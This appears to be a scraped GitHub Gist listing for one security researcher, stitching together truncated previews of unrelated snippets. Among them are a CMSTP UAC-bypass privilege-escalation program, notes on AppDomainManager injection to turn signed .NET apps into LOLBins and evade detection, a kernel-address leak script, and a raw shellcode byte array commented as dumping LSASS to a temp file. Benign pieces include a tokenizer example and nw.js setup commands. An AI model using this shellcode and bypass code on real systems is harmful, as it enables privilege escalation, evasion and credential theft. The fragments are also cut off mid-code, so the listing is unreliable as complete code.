Sheng-Hao Ma aaaddress1
aaaddress1 / CMSTP_UACBypass_viaPowerShell.cpp
Created October 24, 2024 15:06
Spawn a PowerShell process with no sensitive command-line parameters and automate line-by-line input of the CMSTP UAC bypass commands to complete the privilege escalation
#include <windows.h>
#include <iostream>
// CMSTP UAC Bypass PowerShell Version.
// ref: https://github.com/tylerapplebaum/CMSTP-UACBypass/blob/master/UACBypassCMSTP.ps1
auto cmstp_uacbypass_ps1 = "# UAC Bypass poc using SendKeys\n"
"# Version 1.0\n"
"# Author: Oddvar Moe\n"
"# Functions borrowed from: https://powershell.org/forums/topic/sendkeys/\n"
"# Todo: Hide window on screen for stealth\n"
# Convert GPT-2 BPE-tokenizer tokens back to UTF-8
# The conversion only applies to tokens outside the vocabulary that are represented as raw bytes (e.g. Chinese characters)
from transformers import AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("gpt2")
word = "台"
tokens = tokenizer.convert_ids_to_tokens(tokenizer(word,add_special_tokens=False)["input_ids"])
print("tokens:",tokens)
# convert to UTF-8
aaaddress1 / _notes.md
Created September 12, 2024 14:47 — forked from djhohnstein/_notes.md
AppDomainManager Injection

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed; they do this by matching the Original Filename field to the Process Name.

In this example, we don't have to rename anything. We simply coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

aaaddress1 / rename.c
Created May 7, 2024 03:22
Rename File on Disk using SetFileInformationByHandle | Win32 API
#define _UNICODE
#define UNICODE
#include <windows.h>
#ifdef __cplusplus
#include <cstdio>
#else
#include <stdio.h>
#endif
aaaddress1 / LeakNtKrnlAddr.ps1
Created September 26, 2023 03:16
Abuse EnumDeviceDrivers() to leak the location of the Windows NT Kernel
Add-Type -TypeDefinition @"
// ref: http://showlinkroom.me/2020/10/16/WindowKernelExploit01/
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
public static class EVD2
{
[DllImport("kernel32.dll")]
aaaddress1 / ExeMask.py
Last active September 28, 2024 14:15
Strip your personal compile info from Exe Files
import pefile, struct, sys
if len(sys.argv) != 2:
print(f"Strip your personal compile info from Exe Files by [email protected]")
print(f"Usage: {sys.argv[0]} [path/to/exe]")
sys.exit(-1)
# Rewrite from pefile: https://github.com/erocarrera/pefile/blob/593d094e35198dad92aaf040bef17eb800c8a373/pefile.py#L3402
def mask_myRichHdr(in_pefile):
DANS = 0x536E6144 # 'DanS' as dword
aaaddress1 / shellcode64.c
Last active May 3, 2024 22:10
Windows 64bit Shellcode
// sprintf(commandLine, L"%i C:\\Windows\\Temp\\DumpLsass.log full", GetCurrentProcessId); MiniDumpW(0, 0, commandLine);
char shellcode_selfDumpToTmp[] = "\xe9\x0c\x02\x00\x00\x90\x48\x89\xc8\x48\x8d\x49\x02\x66\x83\x38\x00\xb8\x00\x00\x00\x00\x74\x28\x0f\x1f\x84\x00\x00\x00\x00\x00\x44\x0f\xb7\x01\x48\x83\xc1\x02\x44\x89\xc2\x83\xca\x20\x0f\xb7\xd2\x01\xd0\xc1\xc8\x08\x66\x45\x85\xc0\x75\xe4\xc3\x0f\x1f\x00\xc3\x48\x89\xc8\x48\x8d\x49\x01\x80\x38\x00\xb8\x00\x00\x00\x00\x74\x26\x66\x0f\x1f\x44\x00\x00\x44\x0f\xb6\x01\x48\x83\xc1\x01\x44\x89\xc2\x83\xca\x20\x0f\xbe\xd2\x01\xd0\xc1\xc8\x08\x45\x84\xc0\x75\xe5\xc3\x0f\x1f\x40\x00\xc3\x65\x48\x8b\x04\x25\x60\x00\x00\x00\x48\x8b\x40\x18\x4c\x8b\x48\x20\x4c\x8d\x58\x20\x4d\x39\xcb\x74\x34\x48\x83\xec\x28\x41\x89\xca\xeb\x0c\x0f\x1f\x40\x00\x4d\x8b\x09\x4d\x39\xcb\x74\x18\x49\x8b\x49\x50\xe8\x55\xff\xff\xff\x44\x39\xd0\x75\xea\x49\x8b\x41\x20\x48\x83\xc4\x28\xc3\x90\x31\xc0\x48\x83\xc4\x28\xc3\x31\xc0\xc3\x57\x56\x53\x48\x83\xec\x20\x48\x63\x41\x3c\x8b\xb4\x01\x88\
aaaddress1 / rtVirusTotalScan.py
Last active February 1, 2023 05:29
Real-Time Parse VirusTotal's Cuckoo Reports for the specific Sample by Hash
# can search sample's hash on virustotal by the following query:
# >>> {RANSOMWARE_FAMILY} and sandbox_name:virustotal_cuckoofork and engines:ransom
import sys
import requests
if len(sys.argv) != 2:
print(f"usage: {sys.argv[0]} <sample-hash> by aaaddress1.\n")
sys.exit(-1)
url = 'https://www.virustotal.com/vtapi/v2/file/behaviour'
wget //github.com/LeonardLaszlo/nw.js-armv7-binaries/releases/download/nw60-arm64_2022-01-08/nw60-arm64_2022-01-08.tar.gz
tar xvf nw60-arm64_2022-01-08.tar.gz
tar xvf usr/docker/dist/nwjs-chromium-ffmpeg-branding/nwjs-symbol-v0.60.1-linux-arm64.tar.gz
cd nwjs-v0.60.1-linux-arm64/
export DISPLAY=:0.0
./nw --use-gl=egl --ignore-gpu-blacklist --disable-accelerated-2d-canvas --num-raster-threads=2
__int64 __fastcall LdrpInitialize(PCONTEXT threadCtx, IMAGE_DOS_HEADER *peImgToFix)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
currTeb = NtCurrentTeb();
while ( 1 )
{
loadStep = (unsigned int)_InterlockedCompareExchange(&LdrpProcessInitialized, 1, 0);
if ( (_DWORD)loadStep == 1 && (currTeb->SameTebFlags & 0x2000) == 0 )
goto done;